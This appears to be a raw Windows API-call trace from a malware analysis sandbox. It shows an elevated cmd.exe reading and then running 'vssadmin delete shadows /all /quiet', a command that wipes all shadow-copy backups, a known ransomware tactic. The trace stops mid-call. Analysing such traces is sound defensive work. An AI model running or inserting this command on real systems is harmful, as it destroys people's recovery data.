[0124.396] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.396] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.396] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.396] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e338, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0124.397] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.397] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.397] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.397] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33a, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0124.397] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.397] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.397] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.397] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0124.397] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.397] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.397] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.397] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0124.397] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.397] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.397] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.397] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e340, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0124.397] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.397] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.397] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.397] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e342, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0124.397] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.397] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.397] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.397] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e344, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0124.398] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.398] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.398] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.398] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e346, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0124.398] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.398] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.398] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.398] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e348, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0124.398] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.398] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.398] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.398] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34a, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0124.398] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.398] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.398] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.398] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0124.398] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.398] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.398] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.398] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e34e, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0124.398] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.398] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.398] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.398] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e350, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0124.399] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.399] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.399] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.399] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e352, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0124.399] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.399] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.399] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.399] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e354, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0124.399] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.399] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.399] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.399] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e356, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0124.399] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.399] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.399] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.399] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e358, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0124.399] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.399] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.399] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.399] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e35a, cchWideChar=1 | out: lpWideCharStr="/") returned 1 [0124.399] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.399] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.399] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.399] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e35c, cchWideChar=1 | out: lpWideCharStr="q") returned 1 [0124.399] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.400] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.400] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.400] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e35e, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0124.400] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.400] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.400] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.400] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e360, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0124.400] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.400] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.400] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.400] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e362, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0124.400] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.400] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.400] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.400] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e364, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0124.400] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.400] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.400] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0124.400] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e366, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0124.401] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.401] GetFileType (hFile=0x9c) returned 0x3 [0124.401] _get_osfhandle (_FileHandle=0) returned 0x9c [0124.401] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.401] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.401] GetFileType (hFile=0xa8) returned 0x3 [0124.401] _get_osfhandle (_FileHandle=1) returned 0xa8 [0124.401] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="vssadmin delete shadows /all /quiet\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin delete shadows /all /quiet\n", lpUsedDefaultChar=0x0) returned 37 [0124.401] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x1efb98, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1efb98*=0x24, lpOverlapped=0x0) returned 1 [0124.401] GetProcessHeap () returned 0x2e0000 [0124.402] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4012) returned 0x2fb240 [0124.402] GetProcessHeap () returned 0x2e0000 [0124.402] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fb240 | out: hHeap=0x2e0000) returned 1 [0124.402] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0124.402] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0124.402] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0124.402] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0124.403] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0124.403] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0124.403] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0124.403] GetProcessHeap () returned 0x2e0000 [0124.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2f97c0 [0124.403] GetProcessHeap () returned 0x2e0000 [0124.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x22) returned 0x2f4610 [0124.403] GetProcessHeap () returned 0x2e0000 [0124.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x48) returned 0x2f9880 [0124.404] GetConsoleOutputCP () returned 0x1b5 [0124.404] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0124.404] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0124.404] GetConsoleTitleW (in: lpConsoleTitle=0x1efb50, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0124.405] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0124.405] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0124.405] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0124.405] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0124.405] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0124.405] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0124.405] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0124.405] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0124.405] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0124.405] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0124.405] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0124.405] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0124.405] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0124.405] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0124.405] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0124.405] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0124.405] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0124.405] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0124.405] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0124.405] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0124.406] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0124.406] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0124.406] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0124.406] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0124.406] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0124.406] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0124.406] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0124.406] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0124.406] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0124.406] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0124.406] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0124.406] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0124.406] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0124.406] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0124.406] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0124.406] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0124.406] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0124.406] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0124.406] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0124.406] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0124.406] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0124.406] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0124.406] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0124.406] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0124.406] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0124.406] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0124.406] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0124.406] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0124.406] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0124.406] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0124.406] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0124.406] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0124.406] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0124.406] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0124.407] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0124.407] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0124.407] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0124.407] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0124.407] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0124.407] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0124.407] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0124.407] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0124.407] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0124.407] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0124.407] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0124.407] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0124.407] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0124.407] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0124.407] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0124.407] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0124.407] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0124.407] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0124.407] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0124.407] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0124.407] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0124.407] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0124.407] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0124.407] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0124.407] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0124.407] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0124.407] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0124.407] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0124.407] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0124.407] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0124.407] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0124.407] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0124.407] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0124.408] GetProcessHeap () returned 0x2e0000 [0124.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2faa10 [0124.408] GetProcessHeap () returned 0x2e0000 [0124.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x5a) returned 0x2f5b70 [0124.408] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0124.408] GetProcessHeap () returned 0x2e0000 [0124.408] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x420) returned 0x2fb240 [0124.408] SetErrorMode (uMode=0x0) returned 0x0 [0124.408] SetErrorMode (uMode=0x1) returned 0x0 [0124.408] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2fb250, lpFilePart=0x1ef3e0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1ef3e0*="system32") returned 0x13 [0124.409] SetErrorMode (uMode=0x0) returned 0x1 [0124.409] GetProcessHeap () returned 0x2e0000 [0124.409] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2fb240, Size=0x4a) returned 0x2fb240 [0124.409] GetProcessHeap () returned 0x2e0000 [0124.409] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2fb240) returned 0x4a [0124.409] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab3f360, nSize=0x2000 | out: 